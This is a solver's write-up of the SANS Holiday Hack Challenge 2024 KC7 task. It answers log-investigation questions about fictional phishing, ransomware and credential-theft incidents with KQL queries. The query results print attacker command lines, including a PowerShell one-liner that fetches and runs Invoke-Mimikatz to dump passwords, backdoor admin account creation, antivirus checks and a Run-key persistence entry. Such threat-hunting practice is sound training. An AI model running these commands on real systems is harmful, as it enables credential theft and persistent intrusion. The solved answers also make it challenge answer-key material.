2024-12-02

SANS Holiday Hack Challenge 2024 - Act 2

Microsoft KC7

Difficulty: ❄ ❄ ❄ ❄ ❄
Answer two sections for silver, all four sections for gold.

KQL 101

Learn and practice basic KQL queries to analyze data logs for North Pole operations.

Section 1: KQL 101

Question 1

Type let’s do this to begin your KQL training.

ANSWER: let's do this

Question 2

Once you’ve examined all the tables, type when in doubt take 10 to proceed.

ANSWER: when in doubt take 10

Question 3

How many elves did you find?

QUERY:

1 2	Employees \| count

RESULTS:

Count
`90`

ANSWER: 90

Question 4

Can you find out the name of the Chief Toy Maker?

QUERY:

1
2
3

Employees
| where role == "Chief Toy Maker"
| project name

RESULTS:

name
`Shinny Upatree`

ANSWER: Shinny Upatree

Question 5

Type operator to continue.

ANSWER: operator

Question 6

Can you find out the name of the Chief Toy Maker?

QUERY:

Email
| join kind = inner Employees on $left.recipient == $right.email_addr
| where name == "Angel Candysalt"
| count

RESULTS:

Count
`31`

ANSWER: 31

Question 7

How many distinct recipients were seen in the email logs from twinkle_frostington@santaworkshopgeeseislands.org?

QUERY:

Email
| where sender has "twinkle_frostington@santaworkshopgeeseislands.org"
| distinct recipient
| count

RESULTS:

Count
`32`

ANSWER: 32

Question 8

How many distinct websites did Twinkle Frostington visit?

QUERY:

OutboundNetworkEvents
| join kind=inner Employees on $left.src_ip == $right.ip_addr
| where name == "Twinkle Frostington"
| distinct url
| count

RESULTS:

Count
`4`

ANSWER: 4

Question 9

How many distinct domains in the PassiveDns records contain the word green?

QUERY:

PassiveDns
| where domain contains "green"
| distinct domain
| count

RESULTS:

Count
`10`

ANSWER: 10

Question 10

How many distinct URLs did elves with the first name Twinkle visit?

QUERY:

OutboundNetworkEvents
| join kind=inner Employees on $left.src_ip == $right.ip_addr
| where name has "Twinkle"
| distinct url
| count

RESULTS:

Count
`8`

ANSWER: 8

Operation Surrender

Investigate a phishing attack targeting Wombley’s team, uncovering espionage activities.

Section 2: Operation Surrender: Alabaster’s Espionage

Question 1

Type surrender to continue.

ANSWER: surrender

Question 2

Who was the sender of the phishing email that set this plan into motion?

QUERY:

1
2
3

Email
| where subject contains "surrender"
| distinct sender

RESULTS:

sender
`surrender@northpolemail.com`

ANSWER: surrender@northpolemail.com

Question 3

How many elves from Team Wombley received the phishing email?

QUERY:

Email
| where subject contains "surrender"
| distinct recipient
| count

RESULTS:

count
`22`

ANSWER: 22

Question 4

What was the filename of the document that Team Alabaster distributed in their phishing email?

QUERY:

Email
| where subject contains "surrender"
| extend filename = tostring(split(link, "/")[-1])
| distinct filename

RESULTS:

filename
`Team_Wombley_Surrender.doc`

ANSWER: Team_Wombley_Surrender.doc

Question 5

Who was the first person from Team Wombley to click the URL in the phishing email?

QUERY:

Employees
| join kind=inner OutboundNetworkEvents on $left.ip_addr == $right.src_ip
| where url has "Team_Wombley_Surrender.doc"
| sort by timestamp asc
| limit 1
| project name

RESULTS:

name
`Joyelle Tinseltoe`

ANSWER: Joyelle Tinseltoe

Question 6

What was the filename that was created after the .doc was downloaded and executed?

QUERY:

Employees
| join kind=inner OutboundNetworkEvents on $left.ip_addr == $right.src_ip
| join kind=inner ProcessEvents on hostname and username
| where name has "Joyelle Tinseltoe" and url has "Team_Wombley_Surrender.doc" and timestamp1 > timestamp
| sort by timestamp1 asc 
| limit 2
| project download_timestamp=timestamp, execution_timestamp=timestamp1, process_commandline, process_name

RESULTS:

download_timestamp	execution_timestamp	process_commandline	process_name
`2024-11-27T14:11:45Z`	`2024-11-27T14:12:44Z`	`Explorer.exe "C:\Users\jotinseltoe\Downloads\Team_Wombley_Surrender.doc"`	`Explorer.exe`
`2024-11-27T14:11:45Z`	`2024-11-27T14:12:45Z`	`C:\Users\Public\AppData\Roaming\keylogger.exe`	`keylogger.exe`

ANSWER:
The above results shows just 59s since downloading the file, Joyelle opened it (😡 bad user!), and the first event after that has the command line C:\Users\Public\AppData\Roaming\keylogger.exe which looks like a dropped executable.
The answer is the filename keylogger.exe.

Question 7

To obtain your flag use the KQL below with your last answer!

QUERY:

1	print base64_encode_tostring("keylogger.exe");

RESULTS:

print_0
`a2V5bG9nZ2VyLmV4ZQ==`

ANSWER: a2V5bG9nZ2VyLmV4ZQ==

Operation Snowfall

Track and analyze the impacts of a ransomware attack initiated by Wombley’s faction.

Section 3: Operation Snowfall: Team Wombley’s Ransomware Raid

Question 1

Type snowfall to begin

ANSWER: snowfall

Question 2

What was the IP address associated with the password spray?

QUERY:

AuthenticationEvents
| where result == "Failed Login"
| summarize dcount(username) by src_ip
| sort by dcount_username desc
| limit 1

RESULTS:

src_ip	dcount_username
`59.171.58.12`	`44`

ANSWER: 59.171.58.12

Question 3

How many unique accounts were impacted where there was a successful login from 59.171.58.12?

QUERY:

AuthenticationEvents
| where result != "Failed Login" and src_ip == "59.171.58.12"
| distinct username
| count

RESULTS:

count
`23`

ANSWER: 23

Question 4

What service was used to access these accounts/devices?

QUERY:

AuthenticationEvents
| where src_ip == "59.171.58.12" and result != "Failed Login"
| extend service = tostring(split(split(description, " ")[-1], ".")[0])
| distinct service

RESULTS:

service
`RDP`

ANSWER: RDP

Question 5

What file was exfiltrated from Alabaster’s laptop?

QUERY:

AuthenticationEvents
| join kind=inner Employees on hostname
| join kind=inner ProcessEvents on hostname
| where name == "Alabaster Snowball" and src_ip == "59.171.58.12" and result != "Failed Login" and timestamp1 > timestamp and process_commandline has "copy"
| sort by timestamp1 asc
| project timestamp1, process_commandline

RESULTS:

timestamp1	process_commandline
`2024-12-15T14:52:13Z`	`Copy-Item "C:\\Malware\\EncryptEverything.exe" -Destination "C:\\Windows\\Users\\alsnowball"`
`2024-12-15T14:52:32Z`	`copy C:\Windows\Users\alsnowball\top secret\Snowball_Cannon_Plans.pdf C:\Users\alsnowball\Documents\Snowball_Cannon_Plans.pdf`
`2024-12-16T14:53:27Z`	`copy C:\Windows\Users\alsnowball\top secret\Drone_Configurations.pdf C:\Users\alsnowball\Documents\Drone_Configurations.pdf`
`2024-12-16T15:51:52Z`	`copy C:\Users\alsnowball\AppData\Local\Temp\Secret_Files.zip \\wocube\share\alsnowball\Secret_Files.zip`

ANSWER:
From ProcessEvents we can observe some copy commands being executed but just copy C:\Users\alsnowball\AppData\Local\Temp\Secret_Files.zip \\wocube\share\alsnowball\Secret_Files.zip pointing to an external destination and copying out C:\Users\alsnowball\AppData\Local\Temp\Secret_Files.zip.
The answer is the filename Secret_Files.zip.

Question 6

What is the name of the malicious file that was run on Alabaster’s laptop?

QUERY:

AuthenticationEvents
| join kind=inner Employees on hostname
| join kind=inner ProcessEvents on hostname
| where name == "Alabaster Snowball" and src_ip == "59.171.58.12" and result != "Failed Login" and timestamp1 > timestamp
| distinct process_name

RESULTS:

process_name
`cmd.exe`
`svchost.exe`
`msedgewebview2.exe`
`powershell.exe`
`EncryptEverything.exe`
`searchprotocolhost.exe`
`comppkgsrv.exe`
`Copy-Item`

ANSWER:
Among the other commands executed on Alabaster’s machine after the successful login of the IP 59.171.58.12 the one that stands out the most is EncryptEverything.exe.
The answer is the name of such command EncryptEverything.exe.

Question 7

To obtain your flag use the KQL below with your last answer!

QUERY:

1	print base64_encode_tostring("EncryptEverything.exe");

RESULTS:

print_0
`RW5jcnlwdEV2ZXJ5dGhpbmcuZXhl`

ANSWER: RW5jcnlwdEV2ZXJ5dGhpbmcuZXhl

Echoes in the Frost

Use logs to trace an unknown phishing attack targeting Alabaster’s faction.

Section 4: Echoes in the Frost: Tracking the Unknown Threat

Question 1

Type stay frosty to begin

ANSWER: stay frosty

Question 2

What was the timestamp of first phishing email about the breached credentials received by Noel Boetie?

QUERY:

Email
| where subject has "credentials"
| sort by timestamp asc 
| project timestamp
| limit 1

RESULTS:

timestamp
`2024-12-12T14:48:55Z`

ANSWER: 2024-12-12T14:48:55Z

Question 3

When did Noel Boetie click the link to the first file?

QUERY:

Email
| join kind=inner Employees on $left.recipient == $right.email_addr
| join kind=inner OutboundNetworkEvents on $left.ip_addr == $right.src_ip, $left.link == $right.url
| where subject has "credentials" and timestamp1 > timestamp
| project timestamp1
| sort by timestamp1 asc 
| limit 1

RESULTS:

timestamp1
`2024-12-12T15:13:55Z`

ANSWER: 2024-12-12T15:13:55Z

Question 4

What was the IP for the domain where the file was hosted?

QUERY:

Email
| where subject has "credentials"
| extend domain = tostring(split(link,"/")[2])
| join kind=inner PassiveDns on domain
| distinct ip

RESULTS:

ip
`182.56.23.122`

ANSWER: 182.56.23.122

Question 5

Let’s take a closer look at the authentication events. I wonder if any connection events from 182.56.23.122. If so what hostname was accessed?

QUERY:

1
2
3

AuthenticationEvents
| where src_ip == "182.56.23.122"
| distinct hostname

RESULTS:

hostname
`WebApp-ElvesWorkshop`

ANSWER: WebApp-ElvesWorkshop

Question 6

What was the script that was run to obtain credentials?

QUERY:

AuthenticationEvents
| join kind=inner ProcessEvents on hostname
| where src_ip == "182.56.23.122" and timestamp1 > timestamp
| project process_commandline

RESULTS:

process_commandline
`net user frosty AllYourBaseBelongToUs /add`
`powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::logonpasswords"`
`net view /domain`
`net localgroup administrators frosty /add`
`ipconfig /all`
`tasklist \| findstr /I "mcshield.exe"`
`tasklist \| findstr /I "norton.exe"`
`tasklist \| findstr /I "avp.exe"`

ANSWER:
Looking at the commands executed after the authentication of 182.56.23.122 we can observe the command line powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::logonpasswords" that downloads Invoke-Mimikatz.ps1 and then execute it.
The answer is the script name Invoke-Mimikatz.ps1.

Question 7

What is the timestamp where Noel executed the file?

QUERY:

Email
| join kind=inner Employees on $left.recipient == $right.email_addr
| join kind=inner ProcessEvents on hostname
| extend filename = tostring(split(link, "/")[-1])
| where subject has "credentials" and process_commandline has filename
| project timestamp1, process_commandline
| sort by timestamp1 asc 
| limit 1

RESULTS:

timestamp1	process_commandline
`2024-12-12T15:14:38Z`	`Explorer.exe "C:\Users\noboetie\Downloads\echo.exe"`

ANSWER: 2024-12-12T15:14:38Z

Question 8

What domain was the holidaycandy.hta file downloaded from?

QUERY:

OutboundNetworkEvents
| where url has "holidaycandy.hta"
| extend domain = tostring(split(url,"/")[2])
| distinct domain

RESULTS:

domain
`compromisedchristmastoys.com`

ANSWER: compromisedchristmastoys.com

Question 9

what was the first file that was created after extraction?

QUERY:

ProcessEvents
| join kind=inner FileCreationEvents on hostname
| where process_commandline has "frosty.zip" and timestamp1 > timestamp
| sort by timestamp1 asc
| distinct filename
| limit 1

RESULTS:

filename
`sqlwriter.exe`

ANSWER: sqlwriter.exe

Question 10

What is the name of the property assigned to the new registry key?

QUERY:

ProcessEvents
| join kind=inner ProcessEvents on hostname
| where process_commandline has "frosty.txt" and timestamp1 > timestamp
| project process_commandline1

RESULTS:

process_commandline1
`tar -xf C:\\Windows\\Tasks\\frosty.zip -C C:\\Windows\\Tasks\\`
`New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "MS SQL Writer" -Force \| New-ItemProperty -Name "frosty" -Value "C:\Windows\Tasks\sqlwriter.exe" -PropertyType String -Force`

ANSWER: frosty

Question 11

To obtain your FINAL flag use the KQL below with your last answer!

QUERY:

1	print base64_encode_tostring("frosty");

RESULTS:

print_0
`ZnJvc3R5`

ANSWER: ZnJvc3R5